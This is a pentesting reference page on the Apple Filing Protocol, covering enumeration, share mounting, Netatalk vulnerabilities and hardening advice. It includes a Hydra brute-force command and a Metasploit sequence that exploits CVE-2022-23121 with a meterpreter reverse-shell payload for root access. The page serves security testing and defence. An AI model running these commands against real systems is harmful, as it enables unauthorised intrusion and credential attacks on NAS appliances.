# 548 - Pentesting Apple Filing Protocol (AFP)

{{#include ../banners/hacktricks-training.md}}

## Basic Information

The **Apple Filing Protocol** (**AFP**), once known as AppleTalk Filing Protocol, is a specialized network protocol included within **Apple File Service** (**AFS**). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX-style and ACL permissions, resource forks, named extended attributes and sophisticated file-locking mechanisms.

Although AFP has been superseded by SMB in modern macOS releases (SMB is the default since OS X 10.9), it is still encountered in:

* Legacy macOS / Mac OS 9 environments
* NAS appliances (QNAP, Synology, Western Digital, TrueNAS…) that embed the open-source **Netatalk** daemon
* Mixed-OS networks where Time-Machine-over-AFP is still enabled

**Default TCP Port:** **548** (AFP over TCP / DSI)

```bash
PORT    STATE SERVICE
548/tcp open  afp
```

---

## Enumeration

### Quick banner / server info

```bash
# Metasploit auxiliary
use auxiliary/scanner/afp/afp_server_info
run RHOSTS=<IP>

# Nmap NSE
nmap -p 548 -sV --script "afp-* and not dos" <IP>
```

Useful AFP NSE scripts:

| Script | What it does |
|--------|--------------|
| **afp-ls** | List available AFP volumes and files |
| **afp-brute** | Password brute-force against AFP login |
| **afp-serverinfo** | Dump server name, machine type, AFP version, supported UAMs, etc. |
| **afp-showmount** | List shares together with their ACLs |
| **afp-path-vuln** | Detects (and can exploit) directory traversal, CVE-2010-0533 |

The NSE brute-force script can be combined with Hydra/Medusa if more control is required:

```bash
hydra -L users.txt -P passwords.txt afp://<IP>
```

### Interacting with shares

*macOS*

```bash
# Finder → Go → "Connect to Server…"
# or from terminal
mkdir /Volumes/afp
mount_afp afp://USER:PASS@<IP>/SHARE /Volumes/afp
```

*Linux* (using `afpfs-ng`, packaged in most distros)

```bash
apt install afpfs-ng
mkdir /mnt/afp
mount_afp afp://USER:PASS@<IP>/SHARE /mnt/afp
# or interactive client
afp_client
```

Once mounted, remember that classic Mac resource forks are stored as hidden `._*` AppleDouble files – these often hold interesting metadata that DFIR tools miss.

---

## Common Vulnerabilities & Exploitation

### Netatalk unauthenticated RCE chain (2022)

Several NAS vendors shipped **Netatalk ≤ 3.1.12**. A lack of bounds checking in `parse_entries()` allows an attacker to craft a malicious **AppleDouble** header and obtain **remote root** before authentication (**CVSS 9.8 – CVE-2022-23121**). A full write-up by NCC Group with a PoC exploiting the Western Digital PR4100 is available.

Metasploit (>= 6.3) ships the module `exploit/linux/netatalk/parse_entries`, which delivers the payload via DSI `WRITE`.

```bash
use exploit/linux/netatalk/parse_entries
set RHOSTS <IP>
set TARGET 0   # Automatic (Netatalk)
set PAYLOAD linux/x64/meterpreter_reverse_tcp
run
```

If the target runs an affected QNAP/Synology firmware, successful exploitation yields a shell as **root**.

### Netatalk OpenSession heap overflow (2018)

Older Netatalk (3.0.0 - 3.1.11) is vulnerable to an out-of-bounds write in the **DSI OpenSession** handler, allowing unauthenticated code execution (**CVE-2018-1160**). A detailed analysis and PoC were published by Tenable Research.
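The unauthenticated server-info exchange that `afp-serverinfo` and the Metasploit scanner rely on, decoded in Python as an added example (not code from the original page, nmap or Netatalk): it builds the DSIGetStatus request, parses the FPGetSrvrInfo reply and flags the guest and clear-text UAMs that the defensive recommendations say to disable. The reply is a constructed sample, so the `NAS-01` name, the machine-type string and the offsets are assumptions.

```python
import struct

# DSI header: flags, command, requestID, errorCode/writeOffset, totalDataLength, reserved.
DSI_REQUEST, DSI_REPLY, DSI_GETSTATUS = 0x00, 0x01, 0x03  # DSIGetStatus needs no auth
WEAK_UAMS = {"No User Authent", "Cleartxt Passwrd"}  # guest and clear-text logins

def dsi_getstatus_request(request_id=1):
    """Build the 16-byte DSIGetStatus request a client sends right after connecting."""
    return struct.pack(">BBHIII", DSI_REQUEST, DSI_GETSTATUS, request_id, 0, 0, 0)

def _pstring(buf, off):
    """Decode a Pascal string (length byte + bytes) at off; returns (text, next_off)."""
    n = buf[off]
    return buf[off + 1:off + 1 + n].decode("mac_roman"), off + 1 + n

def _pstring_list(buf, off):  # count byte followed by that many Pascal strings
    out, count, off = [], buf[off], off + 1
    for _ in range(count):
        s, off = _pstring(buf, off)
        out.append(s)
    return out

def parse_server_info(reply):
    """Parse a DSIGetStatus reply (FPGetSrvrInfo block) and flag weak UAMs it offers."""
    flags, cmd, _req, _err, length, _ = struct.unpack(">BBHIII", reply[:16])
    if flags != DSI_REPLY or cmd != DSI_GETSTATUS:
        raise ValueError("not a DSIGetStatus reply")
    body = reply[16:16 + length]
    # Fixed part: four 16-bit offsets (relative to body) and server flags, then ServerName.
    mt_off, ver_off, uam_off, _icon_off, _srv_flags = struct.unpack(">HHHHH", body[:10])
    uams = _pstring_list(body, uam_off)
    return {
        "server_name": _pstring(body, 10)[0],
        "machine_type": _pstring(body, mt_off)[0],
        "afp_versions": _pstring_list(body, ver_off),
        "uams": uams,
        "weak_uams": sorted(set(uams) & WEAK_UAMS),
    }

def _p(s):  # Pascal-string encoder, used only to build the constructed sample below
    return bytes([len(s)]) + s.encode("mac_roman")

# Constructed sample reply (not a real capture): a NAS advertising DHX2 beside guest/clear-text.
_name, _mt = _p("NAS-01"), _p("Netatalk3.1.12")
_vers = b"\x02" + _p("AFP3.3") + _p("AFP3.4")
_uams = b"\x03" + _p("No User Authent") + _p("Cleartxt Passwrd") + _p("DHX2")
_mt_off = 10 + len(_name)
_body = struct.pack(">HHHHH", _mt_off, _mt_off + len(_mt), _mt_off + len(_mt) + len(_vers),
                    0, 0) + _name + _mt + _vers + _uams
SAMPLE_REPLY = struct.pack(">BBHIII", DSI_REPLY, DSI_GETSTATUS, 1, 0, len(_body), 0) + _body
```

Sending `dsi_getstatus_request()` to a live port 548 and feeding the answer to `parse_server_info()` gives the same fields `afp-serverinfo` prints, plus a `weak_uams` list that is empty on a correctly hardened server.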
### Other notable issues

* **CVE-2022-22995** – Symlink redirection leading to arbitrary file write / RCE when AppleDouble v2 is enabled (3.1.0 - 3.1.17).
* **CVE-2010-0533** – Directory traversal in Apple Mac OS X 10.6 AFP (detected by `afp-path-vuln.nse`).
* Multiple memory-safety bugs were fixed in **Netatalk 4.x (2024)** – recommend upgrading rather than patching individual CVEs.

---

## Defensive Recommendations

1. **Disable AFP** unless strictly required – use SMB3 or NFS instead.
2. If AFP must stay, **upgrade Netatalk to ≥ 3.1.18 or 4.x**, or apply vendor firmware that back-ports the 2022/2023/2024 patches.
3. Enforce **strong UAMs** (e.g. *DHX2*); disable clear-text and guest logins.
4. Restrict TCP 548 to trusted subnets and wrap AFP inside a VPN when exposed remotely.
5. Periodically scan with `nmap -p 548 --script afp-*` in CI/CD to catch rogue / downgraded appliances.

---

### [Brute-Force](../generic-hacking/brute-force.md#afp)

## References

* Netatalk Security Advisory CVE-2022-23121 – "Arbitrary code execution in parse_entries"
* Tenable Research – "Exploiting an 18-Year-Old Bug (CVE-2018-1160)"

{{#include ../banners/hacktricks-training.md}}